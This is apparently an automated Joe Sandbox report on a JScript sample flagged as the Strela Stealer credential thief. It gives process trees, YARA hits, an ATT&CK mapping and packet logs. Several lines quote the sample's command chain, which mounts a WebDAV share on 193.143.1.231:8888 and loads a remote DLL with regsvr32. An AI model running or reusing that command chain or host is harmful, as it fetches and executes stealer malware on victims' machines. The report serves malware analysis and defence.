              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49709
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\net.exe TID: 4268Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: net.exe, 00000005.00000003.2049998000.00000178B0F71000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: net.exe, 00000005.00000002.2130413282.00000178B0F08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpW
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: CreateThread,GetLocaleInfoA,11_2_02209A30
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Strela Stealer
              Source: Yara matchFile source: 11.2.regsvr32.exe.7ff8b7e00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2209539224.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5640, type: MEMORYSTR
              Gathers information about network shares
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Opens network shares
              Source: C:\Windows\System32\regsvr32.exeFile opened: \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeFile opened: \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Strela Stealer
              Source: Yara matchFile source: 11.2.regsvr32.exe.7ff8b7e00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2209539224.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5640, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information12
              Scripting              		Valid AccountsWindows Management Instrumentation12
              Scripting              		11
              Process Injection              		1
              Virtualization/Sandbox Evasion              		OS Credential Dumping2
              Network Share Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		LSASS Memory1
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media11
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information              		Security Account Manager1
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive11
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Regsvr32              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput Capture1
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets12
              System Information Discovery              		SSHKeylogging11
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1576785 Sample: 126484723232027823.js Startdate: 17/12/2024 Architecture: WINDOWS Score: 84 29 Yara detected Strela Downloader 2->29 31 Yara detected Strela Stealer 2->31 33 Uses known network protocols on non-standard ports 2->33 35 Sigma detected: WScript or CScript Dropper 2->35 8 wscript.exe 1 1 2->8         started        process3 signatures4 37 JScript performs obfuscated calls to suspicious functions 8->37 39 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->39 41 Gathers information about network shares 8->41 11 cmd.exe 1 8->11         started        process5 signatures6 45 Gathers information about network shares 11->45 14 cmd.exe 1 11->14         started        17 cmd.exe 1 11->17         started        19 conhost.exe 11->19         started        process7 signatures8 47 Gathers information about network shares 14->47 21 net.exe 7 14->21         started        24 regsvr32.exe 17->24         started        process9 dnsIp10 27 193.143.1.231, 49704, 49705, 49706 BITWEB-ASRU unknown 21->27 43 Opens network shares 24->43 signatures11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              126484723232027823.js0%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://193.143.1.231:8888/%=10%Avira URL Cloudsafe
              http://193.143.1.231:8888//0%Avira URL Cloudsafe
              http://193.143.1.231/0%Avira URL Cloudsafe
              http://193.143.1.231:8888/0%Avira URL Cloudsafe
              http://193.143.1.231:8888/-=90%Avira URL Cloudsafe
              http://193.143.1.231:8888/y=M0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://193.143.1.231:8888/%=1net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://193.143.1.231/net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://193.143.1.231:8888/net.exe, 00000005.00000002.2130413282.00000178B0F95000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2049998000.00000178B0F5D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://193.143.1.231:8888/-=9net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://193.143.1.231:8888/y=Mnet.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://193.143.1.231:8888//net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              193.143.1.231
              		unknownunknown
              		57271BITWEB-ASRUtrue

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1576785
              Start date and time:2024-12-17 15:15:11 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 26s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Run name:Without Instrumentation
              Number of analysed new started processes analysed:13
              Number of new started drivers analysed:1
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:126484723232027823.js
              Detection:MAL
              Classification:mal84.rans.troj.spyw.evad.winJS@12/0@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 71%
              • Number of executed functions: 3
              • Number of non-executed functions: 11
              Cookbook Comments:
              • Found application associated with file extension: .js

              Warnings

              • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 126484723232027823.js

              Simulations

              Behavior and APIs

              TimeTypeDescription
              09:16:02API Interceptor1x Sleep call for process: net.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              BITWEB-ASRUnew.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              qL619hzCfc.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              new.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              https://cgd-assinar.comGet hashmaliciousUnknownBrowse
              • 193.143.1.14
              11iEly4m6C.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              YnViC5yHLu.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              new.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              https://cmd-autenticacaogov.com/Get hashmaliciousUnknownBrowse
              • 193.143.1.14
              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
              • 193.143.1.70

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:ASCII text, with very long lines (11695), with no line terminators
              Entropy (8bit):4.75000181394305
              TrID:
                File name:126484723232027823.js
                File size:11'695 bytes
                MD5:09024cb4c452f96fe5b6045e198092ba
                SHA1:53f924039e79576a5b2e9b90e3c11c1116e933eb
                SHA256:0ff304716b215d4fadbf9fee1be5d717c454a09f6bdbe6e42e29995d969964e8
                SHA512:5e0146dc0e358a0a78964abceb2cf735fd1c7d9e0efaae05a0ad39d441c5329a88f0ff28ce5a6171690963398eb4884219db77e66316348b38f2a979dcb4b494
                SSDEEP:192:JxTxIOSN8HHdiTp9JRSSZxSSGSSZxSSf1OSSB5SS3uVX+++QZPP/RvOSSZxSS5nK:P1y1uVIuuVOhpD
                TLSH:6832BF9DB6E4F44818FE9100336291106DA6747E7F32CB2DB3EE998866443F59ED703A
                File Content Preview:function ftewq(){this[hfgkhke+iqkshjqkp+conprmvk+mwncmi](gebyyu+eoztg+jqskgadc+jvaxx+xqqrniwzz+zxqbq+qtwic+cblmmvh+cblmmvh+iqkshjqkp+acrinokm+qtwic+gebyyu+conprmvk+djwmv+ktqhqp+djwmv+woscoo+acrinokm+gbeabu+cblmmvh+oindqeulx+zxqbq+jvaxx+ktqhqp+qxdyfx+jqskg

                File Icon

                Icon Hash:68d69b8bb6aa9a86

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 17, 2024 15:16:02.208988905 CET497048888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:02.328965902 CET888849704193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:02.329051971 CET497048888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:02.329371929 CET497048888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:02.448918104 CET888849704193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:03.748127937 CET888849704193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:03.792522907 CET497048888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:06.952980042 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:07.074276924 CET888849705193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:07.074402094 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:07.084291935 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:07.204433918 CET888849705193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:08.539954901 CET888849705193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:08.589358091 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:08.655817986 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:08.777126074 CET888849706193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:08.777216911 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:08.777369976 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:08.896972895 CET888849706193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:10.208786011 CET888849706193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:10.218274117 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:10.261400938 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:10.338135958 CET888849707193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:10.338377953 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:10.338555098 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:10.458251953 CET888849707193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:11.761334896 CET888849707193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:11.808101892 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:11.817745924 CET497048888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:11.880009890 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:11.999758959 CET888849708193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:11.999993086 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:12.000483036 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:12.119921923 CET888849708193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:13.427613974 CET888849708193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:13.434827089 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:13.480017900 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:13.555481911 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:13.555691957 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:13.555913925 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:13.676049948 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.979101896 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.979301929 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.979361057 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.979506016 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:14.980051041 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.980086088 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.980123997 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:14.980694056 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.980727911 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.980757952 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:14.981395006 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.981430054 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.981457949 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:14.981519938 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:14.981575966 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.099153996 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.099399090 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.099581003 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.103607893 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.151900053 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.170952082 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.171065092 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.171226025 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.173367023 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.173557043 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.173641920 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.181876898 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.182054996 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.182337046 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.190294981 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.190514088 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.190637112 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.198828936 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.199023962 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.199239969 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.207220078 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.207393885 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.207468987 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.215701103 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.215847015 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.216002941 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.224247932 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.224282980 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.224442005 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.232573032 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.232775927 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.232960939 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.241000891 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.241202116 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.241468906 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.271667004 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.272130966 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.272346973 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.290894985 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.291054010 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.291228056 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.363190889 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.363226891 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.363658905 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.365398884 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.365545988 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.365921021 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.370235920 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.370269060 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.370517969 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.374773979 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.374965906 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.375030994 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.379539967 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.379723072 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.379785061 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.384591103 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.384907007 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.384990931 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.388989925 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.389180899 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.389244080 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.394881964 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.395113945 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.395176888 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.398488045 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.398668051 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.398727894 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.403260946 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.403458118 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.403527021 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.407926083 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.408109903 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.408271074 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.412652016 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.412847042 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.412909985 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.417453051 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.417735100 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.417807102 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.422146082 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.422291040 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.422363043 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.426055908 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.426222086 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.426284075 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.429820061 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.429963112 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.430121899 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.433557034 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.433787107 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.433898926 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.437458038 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.437666893 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.437820911 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.441395044 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.441575050 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.441637993 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.445084095 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.445285082 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.445348024 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.448807001 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.449002981 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.449069023 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.452697039 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.495688915 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.555105925 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.555351973 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.555510998 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.556596994 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.556843996 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.556905031 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.561907053 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.562228918 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.562294006 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.565402031 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.565510988 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.565567970 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.567584038 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.567738056 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.567796946 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.569686890 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.569852114 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.569912910 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.572025061 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.572199106 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.572258949 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.573647022 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.573873997 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.573936939 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.576276064 CET888849709193.143.1.231192.168.2.5
